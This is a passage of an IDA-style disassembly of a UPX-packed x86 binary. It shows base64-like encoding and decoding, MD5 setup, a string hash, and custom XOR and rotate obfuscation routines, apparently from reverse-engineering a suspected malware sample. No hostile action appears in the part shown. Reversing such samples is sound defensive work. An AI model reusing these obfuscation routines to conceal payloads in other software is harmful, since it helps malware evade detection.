; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp ds:off_41DB10[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push ds:off_41DB10[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
locret_40E941: ; CODE XREF: sub_40E618:loc_40E686�j
leave
retn
sub_40E618 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E943 proc near ; CODE XREF: UPX0:00416ABA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40E94E: ; CODE XREF: sub_40E943+32�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E960
jmp short locret_40E977
; ---------------------------------------------------------------------------
loc_40E960: ; CODE XREF: sub_40E943+19�j
push [ebp+var_8]
call sub_407B5E
pop ecx
mov [ebp+var_4], eax
push [ebp+var_8]
call sub_40E618
pop ecx
jmp short loc_40E94E
; ---------------------------------------------------------------------------
locret_40E977: ; CODE XREF: sub_40E943+1B�j
leave
retn
sub_40E943 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E979 proc near ; CODE XREF: UPX0:004168D5�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40E98A
; ---------------------------------------------------------------------------
loc_40E983: ; CODE XREF: sub_40E979+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E98A: ; CODE XREF: sub_40E979+8�j
cmp [ebp+var_4], 100h
jnb short loc_40E99F
mov eax, [ebp+var_4]
and ds:byte_41EA80[eax], 0
jmp short loc_40E983
; ---------------------------------------------------------------------------
loc_40E99F: ; CODE XREF: sub_40E979+18�j
and [ebp+var_4], 0
jmp short loc_40E9AC
; ---------------------------------------------------------------------------
loc_40E9A5: ; CODE XREF: sub_40E979+4C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40E9AC: ; CODE XREF: sub_40E979+2A�j
cmp [ebp+var_4], 40h
jnb short locret_40E9C7
mov eax, [ebp+var_4]
movzx eax, ds:byte_41A18C[eax]
mov cl, byte ptr [ebp+var_4]
mov ds:byte_41EA80[eax], cl
jmp short loc_40E9A5
; ---------------------------------------------------------------------------
locret_40E9C7: ; CODE XREF: sub_40E979+37�j
leave
retn
sub_40E979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C9 proc near ; CODE XREF: sub_40A9CF+34C�p
; sub_40A9CF+E18�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 2
jnb short loc_40E9E8
xor eax, eax
jmp locret_40EB4C
; ---------------------------------------------------------------------------
loc_40E9E8: ; CODE XREF: sub_40E9C9+16�j
and [ebp+var_4], 0
and [ebp+var_8], 0
loc_40E9F0: ; CODE XREF: sub_40E9C9+17A�j
push 1
pop eax
test eax, eax
jz loc_40EB48
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA29
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
shl eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA2E
; ---------------------------------------------------------------------------
loc_40EA29: ; CODE XREF: sub_40E9C9+40�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA2E: ; CODE XREF: sub_40E9C9+5E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EA66
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
sar eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EA6B
; ---------------------------------------------------------------------------
loc_40EA66: ; CODE XREF: sub_40E9C9+72�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA6B: ; CODE XREF: sub_40E9C9+9B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EA99
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
shl eax, 4
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EA9E
; ---------------------------------------------------------------------------
loc_40EA99: ; CODE XREF: sub_40E9C9+B0�j
jmp loc_40EB48
; ---------------------------------------------------------------------------
loc_40EA9E: ; CODE XREF: sub_40E9C9+CE�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EAD6
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, al
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EAD8
; ---------------------------------------------------------------------------
loc_40EAD6: ; CODE XREF: sub_40E9C9+E2�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EAD8: ; CODE XREF: sub_40E9C9+10B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_C]
jnb short loc_40EB06
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
shl eax, 6
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx-1], al
jmp short loc_40EB08
; ---------------------------------------------------------------------------
loc_40EB06: ; CODE XREF: sub_40E9C9+11D�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB08: ; CODE XREF: sub_40E9C9+13B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_40EB3A
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx-1]
or cl, ds:byte_41EA80[eax]
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [eax-1], cl
jmp short loc_40EB3C
; ---------------------------------------------------------------------------
loc_40EB3A: ; CODE XREF: sub_40E9C9+14C�j
jmp short loc_40EB48
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40E9C9+16F�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp loc_40E9F0
; ---------------------------------------------------------------------------
loc_40EB48: ; CODE XREF: sub_40E9C9+2C�j
; sub_40E9C9:loc_40EA29�j ...
mov eax, [ebp+var_4]
dec eax
locret_40EB4C: ; CODE XREF: sub_40E9C9+1A�j
leave
retn
sub_40E9C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EB4E proc near ; CODE XREF: sub_40A9CF+292�p
; sub_40A9CF+D12�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
loc_40EB60: ; CODE XREF: sub_40EB4E:loc_40EC83�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
sar eax, 2
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 4
and eax, 30h
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EBC2
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp loc_40EC88
; ---------------------------------------------------------------------------
loc_40EBC2: ; CODE XREF: sub_40EB4E+52�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 4
and ecx, 0Fh
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
shl eax, 2
and eax, 3Ch
mov [ebp+var_4], al
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC2A
movzx eax, [ebp+var_4]
or al, 1
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC2A: ; CODE XREF: sub_40EB4E+BD�j
movzx eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx]
sar ecx, 6
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, ds:byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, ds:byte_41EA80[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: UPX0:004168EF�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EB84
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EB84
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; sub_41113B+159�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, ds:byte_41EB84[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: UPX0:004168FD�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EB98
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EB98
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EB98
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EB98
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _rotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _rotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _rotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _rotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
